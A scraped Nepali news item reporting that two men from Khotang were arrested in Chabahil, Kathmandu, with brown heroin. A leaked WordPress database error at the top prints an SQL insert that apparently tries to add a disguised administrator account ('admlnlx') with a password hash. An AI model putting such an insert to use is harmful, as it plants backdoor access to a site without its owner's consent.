WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzeTNsrjfPkSWG.egrl5uLyvKf6NC4/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 05:01:03', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ३० वैशाख, काठमाडौं । काठमाडौंको चाबहिलबाट खोटाङ तुवाचुङ ५ सुरेश राई र बबिन राई लागुऔषध खैरो हिरोइनसहित पक्राउ परेका छन् । खोटाङको तुवाचुङ-५ घर भएका २६ वर्षीय सुरेश राई काठमाण्डौको मुलपानी र ३० वर्षीय बबिन राई काठमाडौंकै बालुवाटार बस्दै आएका थिए ।
महानगरीय प्रहरी कपनवाट टोली परिचालन भएको थियो । कपन प्रहरीको टोलीले उनीहरुलाई जाँच गर्दा आठ ग्राम खैरो हिरोइन २५ वटा पोकामा फेला पारेको थियो ।
उनीहरुलाई हिरासतमा लिएर थप अनुसन्धान गरिरहेको कपन प्रहरीले जनाएको छ ।
sourse:onlinekhabar